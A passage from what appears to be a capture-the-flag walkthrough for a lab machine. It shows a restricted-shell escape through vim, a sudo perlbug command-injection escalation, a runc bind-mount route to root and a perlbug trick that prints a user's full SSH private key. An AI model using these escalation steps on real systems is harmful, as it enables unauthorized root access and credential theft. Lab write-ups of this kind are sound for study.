22\nVIM=\/usr\/share\/vim\nXDG_SESSION_CLASS=user\nTERM=xterm-256color\nUSER=morty\nSHLVL=2\nXDG_SESSION_ID=9\nXDG_RUNTIME_DIR=\/run\/user\/1001\nSSH_CLIENT=172.20.10.8 38636 
22\nPATH=\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/games\nMAIL=\/var\/mail\/morty\nSSH_TTY=\/dev\/pts\/1\n_=\/usr\/bin\/printenv\nmorty@rick:~$ ls -la \/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/local\/bin | grep bash\nmorty@rick:~$ ls -la \/usr\/bin | grep bash\n-rwxr-xr-x  1 root root     1302248 Apr 17  2019 bash\n-rwxr-xr-x  1 root root        6789 Apr 17  2019 bashbug\n-rwxr-xr-x  1 root root        2446 Feb 11  2019 dh_bash-completion\nlrwxrwxrwx  1 root root           4 Apr 17  2019 rbash -&gt; bash<\/code><\/pre>\n<p>The bash binary turns out to live in a different directory, one that is on the PATH, so it can be invoked by bare name without the <code>\/<\/code> that rbash forbids:<\/p>\n<pre><code class=\"language-bash\">morty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c &#039;:!\/usr\/bin\/bash&#039;\n\n\/bin\/rbash: \/usr\/bin\/bash: restricted: cannot specify `\/&#039; in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ vim -c &#039;:!bash&#039;\n\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n<p>Suddenly the restrictions are gone (<code>$SHELL<\/code> still reads <code>\/bin\/rbash<\/code> because it is only an inherited variable, but <code>cd \/<\/code> now works):<\/p>\n<pre><code class=\"language-bash\">morty@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Jul 16 03:26 .\ndrwxr-xr-x 4 root  root  4096 Nov 24  2021 ..\nlrwxrwxrwx 1 root  root     9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 morty morty  220 Nov 24  2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24  2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24  2021 .gnupg\n-rw-r--r-- 1 rick  rick   107 Nov 24  2021 .important\n-rw-r--r-- 1 morty morty  807 Nov 24  2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24  2021 .ssh\n-rw------- 1 morty morty  839 Jul 16 03:26 .viminfo\nmorty@rick:~$ cd \/\nmorty@rick:\/$<\/code><\/pre>\n<p>Now try to escalate:<\/p>\n<pre><code class=\"language-bash\">morty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -s &#039;x x x&#039; -r x -c x -e 
&#039;exec \/bin\/bash;&#039;\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org.  To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n&#039;perlthanks&#039;.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it&#039;s not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n    core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n    critical high medium low wishlist none\n\nSeverity [low]: \nrick@rick:\/$ whoami;id\nrick\nuid=1000(rick) gid=1000(rick) groups=1000(rick)<\/code><\/pre>\n<p>Privilege escalation succeeded!<\/p>\n<h3>Escalating to root via runc<\/h3>\n<pre><code class=\"language-bash\">rick@rick:\/$ cd ~\nrick@rick:~$ ls -la\ntotal 36\ndrwxr-xr-x 5 rick rick 4096 Nov 24  2021 .\ndrwxr-xr-x 4 root root 4096 Nov 24  2021 ..\nlrwxrwxrwx 1 root root    9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 rick rick  220 Nov 24  2021 .bash_logout\n-rw-r--r-- 1 rick rick 3526 Nov 24  2021 .bashrc\ndrwx------ 3 rick rick 4096 Nov 24  2021 .gnupg\ndrwxr-xr-x 3 rick rick 4096 Nov 24  2021 .local\n-rw-r--r-- 1 rick rick  807 Nov 24  2021 .profile\ndrwx------ 2 rick rick 4096 Nov 24  2021 .ssh\n-rwx------ 1 rick rick   36 Nov 24  2021 user.txt\nrick@rick:~$ cat user.txt \na52d68b19ebca39c7b821ab1a51fef2e  -\nrick@rick:~$ sudo -l\nMatching Defaults entries for rick on rick:\n    env_reset, mail_badpass, 
secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n    (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:~$ file \/usr\/sbin\/runc\n\/usr\/sbin\/runc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 3.2.0, Go BuildID=v9KnpAr_z7Yq7ynp0kxy\/Z0y3KsZB_zHn9j5Rprf6\/2kcKjaL8lQCM6nVR8R7u\/TV1B2Vmmo5gHdzqOJJ9i, BuildID[sha1]=8e109adbf7464ff1d68ad77a562737048d1a72fc, stripped\nrick@rick:~$ \/usr\/sbin\/runc\nNAME:\n   runc - Open Container Initiative runtime\n\nrunc is a command line client for running applications packaged according to\nthe Open Container Initiative (OCI) format and is a compliant implementation of the\nOpen Container Initiative specification.\n\nrunc integrates well with existing process supervisors to provide a production\ncontainer runtime environment for applications. It can be used with your\nexisting process monitoring tools and the container will be spawned as a\ndirect child of the process supervisor.\n\nContainers are configured using bundles. A bundle for a container is a directory\nthat includes a specification file named &quot;config.json&quot; and a root filesystem.\nThe root filesystem contains the contents of the container.\n\nTo start a new instance of a container:\n\n    # runc run [ -b bundle ] &lt;container-id&gt;\n\nWhere &quot;&lt;container-id&gt;&quot; is your name for the instance of the container that you\nare starting. The name you provide for the container instance must be unique on\nyour host. Providing the bundle directory using &quot;-b&quot; is optional. 
The default\nvalue for &quot;bundle&quot; is the current directory.\n\nUSAGE:\n   runc [global options] command [command options] [arguments...]\n\nVERSION:\n   1.0.0~rc6+dfsg1\ncommit: 1.0.0~rc6+dfsg1-3\nspec: 1.0.1\n\nCOMMANDS:\n     checkpoint  checkpoint a running container\n     create      create a container\n     delete      delete any resources held by the container often used with detached container\n     events      display container events such as OOM notifications, cpu, memory, and IO usage statistics\n     exec        execute new process inside the container\n     init        initialize the namespaces and launch the process (do not call it outside of runc)\n     kill        kill sends the specified signal (default: SIGTERM) to the container&#039;s init process\n     list        lists containers started by runc with the given root\n     pause       pause suspends all processes inside the container\n     ps          ps displays the processes running inside a container\n     restore     restore a container from a previous checkpoint\n     resume      resumes all processes that have been previously paused\n     run         create and run a container\n     spec        create a new specification file\n     start       executes the user defined process in a created container\n     state       output the state of a container\n     update      update container resource constraints\n     help, h     Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n   --debug             enable debug output for logging\n   --log value         set the log file path where internal debug information is written (default: &quot;\/dev\/null&quot;)\n   --log-format value  set the format used by logs (&#039;text&#039; (default), or &#039;json&#039;) (default: &quot;text&quot;)\n   --root value        root directory for storage of container state (this should be located in tmpfs) (default: &quot;\/run\/runc&quot;)\n   --criu value        path to the criu binary used 
for checkpoint and restore (default: &quot;criu&quot;)\n   --systemd-cgroup    enable systemd cgroup support, expects cgroupsPath to be of form &quot;slice:prefix:name&quot; for e.g. &quot;system.slice:runc:434234&quot;\n   --rootless value    ignore cgroup permission errors (&#039;true&#039;, &#039;false&#039;, or &#039;auto&#039;) (default: &quot;auto&quot;)\n   --help, -h          show help\n   --version, -v       print the version<\/code><\/pre>\n<p>Looking for a known weakness, I found: <a href=\"https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation\">https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/runc-privilege-escalation<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722181.png\" alt=\"image-20240716170114432\" style=\"zoom:33%;\" \/><\/p>\n<p>Take a look:<\/p>\n<pre><code class=\"language-bash\">runc -help #Get help and see if runc is installed\nrunc spec #This will create the config.json file in your current folder\n\nInside the &quot;mounts&quot; section of the created config.json add the following lines:\n{\n    &quot;type&quot;: &quot;bind&quot;,\n    &quot;source&quot;: &quot;\/&quot;,\n    &quot;destination&quot;: &quot;\/&quot;,\n    &quot;options&quot;: [\n        &quot;rbind&quot;,\n        &quot;rw&quot;,\n  
      &quot;rprivate&quot;\n    ]\n},\n\n#Once you have modified the config.json file, create the folder rootfs in the same directory\nmkdir rootfs\n\n# Finally, start the container\n# The root folder is the one from the host\nrunc run demo<\/code><\/pre>\n<p>Attempting privilege escalation: insert the snippet into <code>config.json<\/code>, placing it as the next entry under <code>mount<\/code>:<\/p>\n<pre><code class=\"language-bash\">rick@rick:\/tmp$ diff config.json \/home\/rick\/config.json \n65,74d64\n&lt;     &quot;type&quot;: &quot;bind&quot;,\n&lt;     &quot;source&quot;: &quot;\/&quot;,\n&lt;     &quot;destination&quot;: &quot;\/&quot;,\n&lt;     &quot;options&quot;: [\n&lt;         &quot;rbind&quot;,\n&lt;         &quot;rw&quot;,\n&lt;         &quot;rprivate&quot;\n&lt;     ]\n&lt; },\n&lt;               {\n188c178\n&lt; }\n---\n> }<\/code><\/pre>\n<p>Attempting privilege escalation:<\/p>\n<pre><code class=\"language-bash\">rick@rick:\/tmp$ mkdir rootfs\nrick@rick:\/tmp$ sudo -l\nMatching Defaults entries for rick on rick:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser rick may run the following commands on rick:\n    (ALL : ALL) NOPASSWD: \/usr\/sbin\/runc\nrick@rick:\/tmp$ sudo \/usr\/sbin\/runc run demo\n# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n<p>Success!<\/p>\n<h2>Other takeaways<\/h2>\n<h3>perlbug privilege escalation approach<\/h3>\n<p>At the <code>perlbug<\/code> step I also saw another writeup author use the following method to escalate privileges:<\/p>\n<pre><code class=\"language-bash\">morty@rick:\/$ sudo -u rick \/usr\/bin\/perlbug -f \/home\/rick\/.ssh\/id_rsa\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain 
perl at\nperlbug@perl.org.  To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n&#039;perlthanks&#039;.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue.  Be as specific and\ndescriptive as you can. A subject like &quot;perl bug&quot; or &quot;perl\nproblem&quot; will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: aaa a  # the subject must contain a space\nPerl&#039;s developers may need your email address to contact you for\nfurther information about your issue or to inform you when it is\nresolved.  If the default shown is not your email address,\nplease correct it.\n\nYour address [rick@rick]: # keep pressing Enter until the Action prompt, then choose Display to show the message!\n\n\/usr\/bin\/perlbug can send a copy of this report to your local\nperl administrator.  If the address below is wrong, please\ncorrect it, or enter &#039;none&#039; or &#039;yourself&#039; to not send a copy.\n\nLocal perl administrator [root@localhost]: \n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it&#039;s not, just hit Enter\nto skip this question.\n\nModule: \n\nPlease pick a category from the following list:\n\n    core docs install library utilities\n\nCategory [core]: \n\nPlease pick a severity from the following list:\n\n    critical high medium low wishlist none\n\nSeverity [low]: \n\nYou have finished composing your message. At this point, you have \na few options. 
You can:\n\n    * [Se]nd the message to perlbug@perl.org and root@localhost, \n    * [D]isplay the message on the screen,\n    * [R]e-edit the message\n    * Display or change the message&#039;s [su]bject\n    * Save the message to a [f]ile to mail at another time\n    * [Q]uit without sending a message\n\nAction (Send\/Display\/Edit\/Subject\/Save to File): D\n\nThis is a bug report for perl from rick@rick,\ngenerated with the help of perlbug 1.41 running under perl 5.28.1.\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAw0gSyTcBji1NBL5\/yc1JVZMCEm8JMw7yH+pW+20XOM4\/TaozgiXe\neyMjoXXKbNhPHEUmW+B0Ot3ee4C5PG\/aUGyuCPW0VIGa0IBCuygjKCVG\/w6cKAjSPWakOM\n\/RFhqunKY+ZPvR\/4rklU4ekacV\/6ehNw9ti6O+UZIj0FoqNV1rYcC2xMwL2uV+dvHUnZA+\nFqEwvrmNR7ZFRUFJdQZdC99cW4ZpzP5ogdxVORS4+3Ac2D8vML2hzaOuVpUX3KBEsZWDrB\no56EN5v6mFqYA2c\/KsZ+Ot7EHAQly0MsSFYUk9zVIbe9LfKHNZfB9ngilRoRymOwoyPKDd\nq1MQg2PdIwAAA8jZ7Oin2ezopwAAAAdzc2gtcnNhAAABAQDDSBLJNwGOLU0Evn\/JzUlVkw\nISbwkzDvIf6lb7bRc4zj9NqjOCJd57IyOhdcps2E8cRSZb4HQ63d57gLk8b9pQbK4I9bRU\ngZrQgEK7KCMoJUb\/DpwoCNI9ZqQ4z9EWGq6cpj5k+9H\/iuSVTh6RpxX\/p6E3D22Lo75Rki\nPQWio1XWthwLbEzAva5X528dSdkD4WoTC+uY1HtkVFQUl1Bl0L31xbhmnM\/miB3FU5FLj7\ncBzYPy8wvaHNo65WlRfcoESxlYOsGjnoQ3m\/qYWpgDZz8qxn463sQcBCXLQyxIVhST3NUh\nt70t8oc1l8H2eCKVGhHKY7CjI8oN2rUxCDY90jAAAAAwEAAQAAAQBCgRYcvoXiFJ1pIzND\n14zE\/uayvmvEnq9onRb4U0OYTe0TFwapqRnml6X3w7SnctcmSopwubT7ozm0l7b91R3lS8\n3NMVgze1vs6\/FN6bJnZqKSFDisDa0DyiPdUTDktTuID7mqDHSM8ZE9I7iXY+7C\/SSTKsbk\nymPzRbC6sSo0t72jepvLUvs4QC+P4Y63qftzXezWXNU+BLqhHeMoqIOBGbA8xAcH+jXmko\n7SE7RV9QOjGj0I967VA6FVP3kshCjq4ETXP8pcyLKfq5HvlmbpqiKs6lsh2h4PLVaDfnZX\nxxXko4jckmLZ37ZbXQ4enK\/0lQNvUh0wJBWbaivHIEoBAAAAgHMlQR6cXJQe8rFmCu8Aru\n4kwKR3Egc7pMQYPGl7lQrX7o4osbcODFVXM96TL9cxxiy+yPQsbbUJ4yYUH5oeBh\/sUgAv\nFxKVrCpEV5loJ9\/FFQHx6DnhzDy5hixB+znnbliBsDkFIPlI8MFY70ZxBm5mTLN4OFVO\/J\nallMKzTL\/9AAAAgQD6rDTmCuPvEs5HVGFhRQwAbXCKA4zAQ9zkwfRid3Dlz6AkoIw7t7+q\nw8x+Q\/hiidhjtVY4K
375Z5Ircmg\/b42t+iJs671Ob3ubgdF\/fQfzD8G4APxb2lZXmAIbJ6\nP1M9sb3z3ujNv\/UYcWRL+kwtnHLU9b3C6MRcXNkRTmQLBMIwAAAIEAx26CYkJJwx4ZlJG7\nCDCmbofgcFwdcm0iDiXzg1gQN2LRiYeQwtl13h0HUwts5geYDIuTXMTX+vDOB23aNdmHkR\niKmCCrcr4yX9NyCXa8BcYEyoY0eqMdtL4uWZTk67qHol0AMF+NLztzj4OiOV\/WE\/ayzlRh\nKlBx9Esbl5byuwEAAAAOcmlja0BzeW1mb25vczQBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n---\nFlags:\n    category=core\n    severity=low\n---\nSite configuration information for perl 5.28.1:\n\nConfigured by Debian at Tue Jul 21 19:27:00 UTC 2020.\n\nSummary of my perl5 (revision 5 version 28 subversion 1) configuration:\n\n  Platform:\n    osname=linux\n    osvers=4.9.0\n    archname=i686-linux-gnu-thread-multi-64int\n    uname=&#039;linux localhost 4.9.0 #1 smp debian 4.9.0 i686 gnulinux &#039;\n    config_args=&#039;-Dusethreads -Duselargefiles -Dcc=i686-linux-gnu-gcc -Dcpp=i686-linux-gnu-cpp -Dld=i686-linux-gnu-gcc -Dccflags=-DDEBIAN -Wdate-time -D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=\/build\/perl-f1blUn\/perl-5.28.1=. 
-fstack-protector-strong -Wformat -Werror=format-security -Dldflags= -Wl,-z,relro -Dlddlflags=-shared -Wl,-z,relro -Dcccdlflags=-fPIC -Darchname=i686-linux-gnu -Dprefix=\/usr -Dprivlib=\/usr\/share\/perl\/5.28 -Darchlib=\/usr\/lib\/i386-linux-gnu\/perl\/5.28 -Dvendorprefix=\/usr -Dvendorlib=\/usr\/share\/perl5 -Dvendorarch=\/usr\/lib\/i386-linux-gnu\/perl5\/5.28 -Dsiteprefix=\/usr\/local -Dsitelib=\/usr\/local\/share\/perl\/5.28.1 -Dsitearch=\/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1 -Dman1dir=\/usr\/share\/man\/man1 -Dman3dir=\/usr\/share\/man\/man3 -Dsiteman1dir=\/usr\/local\/man\/man1 -Dsiteman3dir=\/usr\/local\/man\/man3 -Duse64bitint -Dman1ext=1 -Dman3ext=3perl -Dpager=\/usr\/bin\/sensible-pager -Uafs\n-Ud_csh -Ud_ualarm -Uusesfio -Uusenm -Ui_libutil -Ui_xlocale -Uversiononly -DDEBUGGING=-g -Doptimize=-O2 -dEs -Duseshrplib -Dlibperl=libperl.so.5.28.1&#039;\n    hint=recommended\n    useposix=true\n    d_sigaction=define\n    useithreads=define\n    usemultiplicity=define\n    use64bitint=define\n    use64bitall=undef\n    uselongdouble=undef\n    usemymalloc=n\n    default_inc_excludes_dot=define\n    bincompat5005=undef\n  Compiler:\n    cc=&#039;i686-linux-gnu-gcc&#039;\n    ccflags =&#039;-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64&#039;\n    optimize=&#039;-O2 -g&#039;\n    cppflags=&#039;-D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-strict-aliasing -pipe -I\/usr\/local\/include&#039;\n    ccversion=&#039;&#039;\n    gccversion=&#039;8.3.0&#039;\n    gccosandvers=&#039;&#039;\n    intsize=4\n    longsize=4\n    ptrsize=4\n    doublesize=8\n    byteorder=12345678\n    doublekind=3\n    d_longlong=define\n    longlongsize=8\n    d_longdbl=define\n    longdblsize=12\n    longdblkind=3\n    ivtype=&#039;long long&#039;\n    ivsize=8\n    nvtype=&#039;double&#039;\n    nvsize=8\n    Off_t=&#039;off_t&#039;\n    lseeksize=8\n    alignbytes=4\n    
prototype=define\n  Linker and Libraries:\n    ld=&#039;i686-linux-gnu-gcc&#039;\n    ldflags =&#039; -fstack-protector-strong -L\/usr\/local\/lib&#039;\n    libpth=\/usr\/local\/lib \/usr\/lib\/gcc\/i686-linux-gnu\/8\/include-fixed \/usr\/include\/i386-linux-gnu \/usr\/lib \/lib\/i386-linux-gnu \/lib\/..\/lib \/usr\/lib\/i386-linux-gnu \/usr\/lib\/..\/lib \/lib\n    libs=-lgdbm -lgdbm_compat -ldb -ldl -lm -lpthread -lc -lcrypt\n    perllibs=-ldl -lm -lpthread -lc -lcrypt\n    libc=libc-2.28.so\n    so=so\n    useshrplib=true\n    libperl=libperl.so.5.28\n    gnulibc_version=&#039;2.28&#039;\n  Dynamic Linking:\n    dlsrc=dl_dlopen.xs\n    dlext=so\n    d_dlsymun=undef\n    ccdlflags=&#039;-Wl,-E&#039;\n    cccdlflags=&#039;-fPIC&#039;\n    lddlflags=&#039;-shared -L\/usr\/local\/lib -fstack-protector-strong&#039;\n\nLocally applied patches:\n    DEBPKG:debian\/cpan_definstalldirs - Provide a sensible INSTALLDIRS default for modules installed from CPAN.\n    DEBPKG:debian\/db_file_ver - https:\/\/bugs.debian.org\/340047 Remove overly restrictive DB_File version check.\n    DEBPKG:debian\/doc_info - Replace generic man(1) instructions with Debian-specific information.\n    DEBPKG:debian\/enc2xs_inc - https:\/\/bugs.debian.org\/290336 Tweak enc2xs to follow symlinks and ignore missing @INC directories.\n    DEBPKG:debian\/errno_ver - https:\/\/bugs.debian.org\/343351 Remove Errno version check due to upgrade problems with long-running processes.\n    DEBPKG:debian\/libperl_embed_doc - https:\/\/bugs.debian.org\/186778 Note that libperl-dev package is required for embedded linking\n    DEBPKG:fixes\/respect_umask - Respect umask during installation\n    DEBPKG:debian\/writable_site_dirs - Set umask approproately for site install directories\n    DEBPKG:debian\/extutils_set_libperl_path - EU:MM: set location of libperl.a under \/usr\/lib\n    DEBPKG:debian\/no_packlist_perllocal - Don&#039;t install .packlist or perllocal.pod for perl or vendor\n    
DEBPKG:debian\/fakeroot - Postpone LD_LIBRARY_PATH evaluation to the binary targets.\n    DEBPKG:debian\/instmodsh_doc - Debian policy doesn&#039;t install .packlist files for core or vendor.\n    DEBPKG:debian\/ld_run_path - Remove standard libs from LD_RUN_PATH as per Debian policy.\n    DEBPKG:debian\/libnet_config_path - Set location of libnet.cfg to \/etc\/perl\/Net as \/usr may not be writable.\n    DEBPKG:debian\/perlivp - https:\/\/bugs.debian.org\/510895 Make perlivp skip include directories in \/usr\/local\n    DEBPKG:debian\/squelch-locale-warnings - https:\/\/bugs.debian.org\/508764 Squelch locale warnings in Debian package maintainer scripts\n    DEBPKG:debian\/patchlevel - https:\/\/bugs.debian.org\/567489 List packaged patches for 5.28.1-6+deb10u1 in patchlevel.h\n    DEBPKG:fixes\/document_makemaker_ccflags - https:\/\/bugs.debian.org\/628522 [rt.cpan.org #68613] Document that CCFLAGS should include $Config{ccflags}\n    DEBPKG:debian\/find_html2text - https:\/\/bugs.debian.org\/640479 Configure CPAN::Distribution with correct name of html2text\n    DEBPKG:debian\/perl5db-x-terminal-emulator.patch - https:\/\/bugs.debian.org\/668490 Invoke x-terminal-emulator rather than xterm in perl5db.pl\n    DEBPKG:debian\/cpan-missing-site-dirs - https:\/\/bugs.debian.org\/688842 Fix CPAN::FirstTime defaults with nonexisting site dirs if a parent is writable\n    DEBPKG:fixes\/memoize_storable_nstore - [rt.cpan.org #77790] https:\/\/bugs.debian.org\/587650 Memoize::Storable: respect &#039;nstore&#039; option not respected\n    DEBPKG:debian\/makemaker-pasthru - https:\/\/bugs.debian.org\/758471 Pass LD settings through to subdirectories\n    DEBPKG:debian\/makemaker-manext - https:\/\/bugs.debian.org\/247370 Make EU::MakeMaker honour MANnEXT settings in generated manpage headers\n    DEBPKG:debian\/kfreebsd-softupdates - https:\/\/bugs.debian.org\/796798 Work around Debian Bug#796798\n    DEBPKG:fixes\/autodie-scope - https:\/\/bugs.debian.org\/798096 Fix a 
scoping issue with &quot;no autodie&quot; and the &quot;system&quot; sub\n    DEBPKG:fixes\/memoize-pod - [rt.cpan.org #89441] Fix POD errors in Memoize\n    DEBPKG:debian\/hurd-softupdates - https:\/\/bugs.debian.org\/822735 Fix t\/op\/stat.t failures on hurd\n    DEBPKG:fixes\/math_complex_doc_great_circle - https:\/\/bugs.debian.org\/697567 [rt.cpan.org #114104] Math::Trig: clarify definition of great_circle_midpoint\n    DEBPKG:fixes\/math_complex_doc_see_also - https:\/\/bugs.debian.org\/697568 [rt.cpan.org #114105] Math::Trig: add missing SEE ALSO\n    DEBPKG:fixes\/math_complex_doc_angle_units - https:\/\/bugs.debian.org\/731505 [rt.cpan.org #114106] Math::Trig: document angle units\n    DEBPKG:fixes\/cpan_web_link - https:\/\/bugs.debian.org\/367291 CPAN: Add link to main CPAN web site\n    DEBPKG:debian\/hppa_op_optimize_workaround - https:\/\/bugs.debian.org\/838613 Temporarily lower the optimization of op.c on hppa due to gcc-6 problems\n    DEBPKG:debian\/installman-utf8 - https:\/\/bugs.debian.org\/840211 Generate man pages with UTF-8 characters\n    DEBPKG:fixes\/getopt-long-4 - https:\/\/bugs.debian.org\/864544 [rt.cpan.org #122068] Fix issue #122068.\n    DEBPKG:debian\/hppa_opmini_optimize_workaround - https:\/\/bugs.debian.org\/869122 Lower the optimization level of opmini.c on hppa\n    DEBPKG:debian\/sh4_op_optimize_workaround - https:\/\/bugs.debian.org\/869373 Also lower the optimization level of op.c and opmini.c on sh4\n    DEBPKG:debian\/perldoc-pager - https:\/\/bugs.debian.org\/870340 [rt.cpan.org #120229] Fix perldoc terminal escapes when sensible-pager is less\n    DEBPKG:debian\/prune_libs - https:\/\/bugs.debian.org\/128355 Prune the list of libraries wanted to what we actually need.\n    DEBPKG:debian\/mod_paths - Tweak @INC ordering for Debian\n    DEBPKG:debian\/configure-regen - https:\/\/bugs.debian.org\/762638 Regenerate Configure et al. 
after probe unit changes\n    DEBPKG:debian\/deprecate-with-apt - https:\/\/bugs.debian.org\/747628 Point users to Debian packages of deprecated core modules\n    DEBPKG:debian\/disable-stack-check - https:\/\/bugs.debian.org\/902779 [perl #133327] Disable debugperl stack extension checks for binary compatibility with perl\n    DEBPKG:debian\/gdbm-fatal - [perl #133295] https:\/\/bugs.debian.org\/904005 Temporarily skip GDBM_File fatal.t for gdbm &gt;= 1.15 compatibility\n    DEBPKG:fixes\/storable-recursion - https:\/\/bugs.debian.org\/912900 [perl #133326] [120060c] (perl #133326) fix and clarify handling of recurs_sv.\n    DEBPKG:fixes\/caretx-fallback - https:\/\/bugs.debian.org\/913347 [perl #133573] [03b94aa] RT#133573: $^X fallback when platform-specific technique fails\n    DEBPKG:fixes\/eumm-usrmerge - https:\/\/bugs.debian.org\/913637 Avoid mangling \/bin non-perl shebangs on merged-\/usr systems\n    DEBPKG:fixes\/errno-include-path - [6c5080f] [perl #133662] https:\/\/bugs.debian.org\/875921 Make Errno_pm.PL compatible with \/usr\/include\/&lt;ARCH&gt;\/errno.h\n    DEBPKG:fixes\/kfreebsd-renameat - [a3c63a9] https:\/\/bugs.debian.org\/912521 [perl #133668] Also work around renameat() kernel bug on GNU\/kFreeBSD\n    DEBPKG:fixes\/time-local-2020 - https:\/\/bugs.debian.org\/915209 [rt.cpan.org #124787] Fix Time::Local tests\n    DEBPKG:fixes\/inplace-editing-bugfix\/part1 - https:\/\/bugs.debian.org\/914651 (perl #133659) move argvout cleanup to a new function\n    DEBPKG:fixes\/inplace-editing-bugfix\/part2 - https:\/\/bugs.debian.org\/914651 (perl #133659) tests for global destruction handling of inplace editing\n    DEBPKG:fixes\/inplace-editing-bugfix\/part3 - https:\/\/bugs.debian.org\/914651 (perl #133659) make an in-place edit successful if the exit status is zero\n    DEBPKG:fixes\/fix-manifest-failures - https:\/\/bugs.debian.org\/914962 Fix t\/porting\/manifest.t failures when run in a foreign git checkout\n    
DEBPKG:fixes\/pipe-open-bugfix\/part1 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in pipe-open as inherit-on-exec\n    DEBPKG:fixes\/pipe-open-bugfix\/part2 - [perl #133726] https:\/\/bugs.debian.org\/916313 Always mark pipe in list pipe-open as inherit-on-exec\n    DEBPKG:fixes\/storable-probing\/prereq1 - [3f4cad1] Storable: fix for strawberry build failures:\n    DEBPKG:fixes\/storable-probing\/prereq2 - [perl #133411] [edf639f] (perl #133411) don&#039;t try to load Storable with -Dusecrosscompile\n    DEBPKG:fixes\/storable-probing\/disable-probing - https:\/\/bugs.debian.org\/914133 [perl #133708] [2a0bbd3] (perl #133708) remove build-time probing for stack limits for Storable\n    DEBPKG:debian\/perlbug-editor - https:\/\/bugs.debian.org\/922609 Use &quot;editor&quot; as the default perlbug editor, as per Debian policy\n    DEBPKG:fixes\/posix-mbrlen - [25d7b7a] https:\/\/bugs.debian.org\/924517 [perl #133928] Fix POSIX::mblen mbstate_t initialization on threaded perls with glibc\n    DEBPKG:fixes\/CVE-2020-10543 - https:\/\/bugs.debian.org\/962005 regcomp.c: Prevent integer overflow from nested regex quantifiers.\n    DEBPKG:fixes\/CVE-2020-10878 - https:\/\/bugs.debian.org\/962005 study_chunk: extract rck_elide_nothing\n    DEBPKG:fixes\/CVE-2020-12723 - https:\/\/bugs.debian.org\/962005 study_chunk: avoid mutating regexp program within GOSUB\n    DEBPKG:fixes\/io-socket-ip-nov4 - https:\/\/bugs.debian.org\/962019 Fix test failures in IO::Socket::IP with an IPv6-only host\n\n---\n@INC for perl 5.28.1:\n    \/etc\/perl\n    \/usr\/local\/lib\/i386-linux-gnu\/perl\/5.28.1\n    \/usr\/local\/share\/perl\/5.28.1\n    \/usr\/lib\/i386-linux-gnu\/perl5\/5.28\n    \/usr\/share\/perl5\n    \/usr\/lib\/i386-linux-gnu\/perl\/5.28\n    \/usr\/share\/perl\/5.28\n    \/usr\/local\/lib\/site_perl\n    \/usr\/lib\/i386-linux-gnu\/perl-base\n\n---\nEnvironment for perl 5.28.1:\n    HOME=\/home\/rick\n    LANG=en_US.UTF-8\n    LANGUAGE (unset)\n    
